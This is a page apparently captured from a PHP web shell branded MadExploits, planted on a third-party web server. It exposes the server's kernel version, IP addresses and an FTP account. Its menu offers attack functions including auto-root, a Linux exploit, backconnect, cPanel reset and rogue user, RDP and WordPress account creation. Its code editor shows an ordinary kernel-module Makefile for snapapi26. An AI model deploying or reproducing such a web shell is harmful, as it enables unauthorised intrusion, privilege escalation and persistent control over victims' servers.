Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
snapapi26-0.8.51 /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
3.46
KB
-rw-r--r--
dkms.conf
467
B
-rw-r--r--
sn_huge_ptr.h
513
B
-rw-r--r--
snapapi.h
8.42
KB
-rw-r--r--
snapapi26.c
147.51
KB
-rw-r--r--
snapapi_genconfig.sh
12.44
KB
-rwxr-xr-x
snumbd.h
3.14
KB
-rw-r--r--
snumbd26.c
40.96
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
SNAPAPI_FLAGS += $(shell \ if grep -qw ''static.*kmap_atomic\(.*page.*,.*\)'\|'define\ kmap_atomic\(page,.*\)'' $(srctree)/include/linux/highmem.h; then \ echo -DHAVE_KMAP_ATOMIC_2ARGS; \ fi) SNAPAPI_FLAGS += $(shell \ grep -qw "pid_ns_for_children" $(srctree)/include/linux/nsproxy.h && \ echo -DHAVE_PID_NS_CHILDREN) SNAPAPI_FLAGS += $(shell \ grep -v '^//' $(srctree)/include/linux/fs.h | grep -qw "f_dentry" && \ echo -DHAVE_FILE_F_DENTRY) SNAPAPI_FLAGS += $(shell \ grep -qw "set_mb" $(srctree)/arch/x86/include/asm/barrier.h \ $(srctree)/arch/x86/include/asm/system.h \ $(srctree)/include/asm/system.h \ $(srctree)/include/asm-generic/system.h && \ echo -DHAVE_ASM_HAVE_SET_MB) SNAPAPI_FLAGS += $(shell \ if grep -qw "extern void bio_endio(.*bio.*,.*)" $(srctree)/include/linux/bio.h; then \ echo -DHAVE_BIO_ENDIO_2ARGS; \ fi) SNAPAPI_FLAGS += $(shell \ if grep -qw "BIO_UPTODATE" $(srctree)/include/linux/blk_types.h \ $(srctree)/include/linux/bio.h ; then \ echo -DHAVE_BIO_UPTODATE; \ elif grep -qw "bi_error" $(srctree)/include/linux/blk_types.h; then \ echo -DHAVE_BIO_BI_ERROR; \ fi) SNAPAPI_FLAGS += $(shell \ if grep -qw "page_cache_release" $(srctree)/include/linux/pagemap.h; then \ echo -DHAVE_PAGE_CACHE_RELEASE; \ fi) SNAPAPI_FLAGS += $(shell \ grep -qw "submit_bio(struct bio \*)\|submit_bio(struct bio \*bio)" $(srctree)/include/linux/fs.h \ $(srctree)/include/linux/bio.h && \ echo -DHAVE_SUBMIT_BIO_ONEARG) SNAPAPI_FLAGS += $(shell \ grep -qw "op_is_write" $(srctree)/include/linux/fs.h \ $(srctree)/include/linux/blk_types.h && \ echo -DHAVE_OP_IS_WRITE) SNAPAPI_FLAGS += $(shell \ grep -qw "bi_opf" $(srctree)/include/linux/fs.h \ $(srctree)/include/linux/blk_types.h && \ echo -DHAVE_BIO_OPF) SNAPAPI_FLAGS += $(shell \ grep -qw "virtual_address;" $(srctree)/include/linux/mm.h && \ echo -DHAVE_VMFAULT_VIRTUAL_ADDRESS) SNAPAPI_FLAGS += $(shell \ grep -qw "fault.(.*,.*)" $(srctree)/include/linux/mm.h && \ echo -DHAVE_VM_FAULT_2ARGS) SNAPAPI_FLAGS += $(shell \ if grep -qw "bio_set_dev" $(srctree)/include/linux/bio.h; then \ echo -DHAVE_BIO_SET_DEV; \ fi) SNAPAPI_FLAGS += $(shell \ if grep -qw "init_timer" $(srctree)/include/linux/timer.h; then \ echo -DHAVE_INIT_TIMER; \ fi) SNAPAPI_FLAGS += $(shell \ grep -qw vm_fault_t $(srctree)/include/linux/mm_types.h && \ echo -DHAVE_VMFAULT_T) SNAPAPI_FLAGS += $(shell \ grep -qw "bi_bdev" $(srctree)/include/linux/blk_types.h \ $(srctree)/include/linux/bio.h && \ echo -DHAVE_BIO_BI_BDEV) SNAPAPI_FLAGS += $(shell \ grep -qw "bdget" $(srctree)/include/linux/fs.h && \ echo -DHAVE_BDGET) SNAPAPI_FLAGS += $(shell \ grep -qw "thaw_bdev(.*,.*)" $(srctree)/include/linux/fs.h \ $(srctree)/include/linux/buffer_head.h \ $(srctree)/include/linux/blkdev.h && \ echo -DHAVE_THAW_BDEV_2ARGS) SNAPAPI_FLAGS += $(shell \ grep -qw "bd_part" $(srctree)/include/linux/blk_types.h \ $(srctree)/include/linux/fs.h && \ echo -DHAVE_BD_PART) SNAPAPI_FLAGS += $(shell \ grep -qw "__state;" $(srctree)/include/linux/sched.h && \ echo -DHAVE_UNDERLINE_STATE) SNAPAPI_FLAGS += $(shell \ grep -qw "complete_and_exit" $(srctree)/include/linux/kernel.h && \ echo -DHAVE_COMPLETE_AND_EXIT) SNAPAPI_FLAGS += $(shell \ grep -qw "bio_alloc(.*,.*)" $(srctree)/include/linux/bio.h && \ echo -DHAVE_BIO_ALLOC_2ARGS) EXTRA_CFLAGS += $(SNAPAPI_FLAGS) $(DKMS_CFLAGS) -Wno-error -g obj-m += snapapi26.o obj-m += snumbd26.o
Close